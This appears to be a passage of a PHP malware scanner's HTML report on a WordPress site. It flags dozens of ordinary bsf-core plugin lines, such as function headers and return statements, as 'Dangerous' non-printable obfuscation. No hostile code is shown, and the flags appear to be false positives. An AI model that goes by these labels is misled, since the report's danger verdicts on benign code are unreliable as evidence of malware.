</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateToken</span><span style="color: #007700">( </span><span style="color: #0000BB">$token</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 290</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">process_envato_activation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessage</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMessage</span><span style="color: #007700">( </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 326</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$message</span><span style="color: #007700">[ </span><span style="color: #0000BB">$key </span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$message</span><span style="color: #007700">[ </span><span style="color: #0000BB">$key </span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inline_alternate_method_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 351</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternate_method_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 362</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 366</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$BSF_Envato_Activate</span><span style="color: #007700">-></span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_368").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 30.44 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 79</span><br><table id="file_369" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_send_json_success</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">); } </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_bsf_envato_redirect_url'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_envato_redirect_url_callback' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_registration' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_registration</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'init_bsf_plugin_installer' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_bsf_plugin_installer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_extension_page' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_extension_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true </span><span style="color: #007700">- If </span><span style="color: #0000BB">menu is to be shown </span><span style="color: #007700">| </span><span style="color: #0000BB">false </span><span style="color: #007700">- if </span><span style="color: #0000BB">menu is not to be displayed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'_bsf_maybe_add_dashboard_menu' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_bsf_maybe_add_dashboard_menu</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_extension_page_network' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_extension_page_network</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extensions_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extensions_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extract_product_id' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 318</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extract_product_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extract_product_id'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id</span><span style="color: #007700">, </span><span style="color: #0000BB">$path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'init_bsf_core' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_bsf_core</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_core_admin_styles' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_core_admin_styles</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 507</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'print_bsf_styles' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">print_bsf_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 539</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_flush_bundled_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_flush_bundled_products</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return array </span><span style="color: #0000BB">of bundled plugins </span><span style="color: #007700">for </span><span style="color: #0000BB">a specific</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_bundled_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_bundled_plugins</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 580</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 612</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_id_by_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstrom_product_id_by_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'set_bsf_core_constant' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_bsf_core_constant</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstrom_product_id_by_init' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 632</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
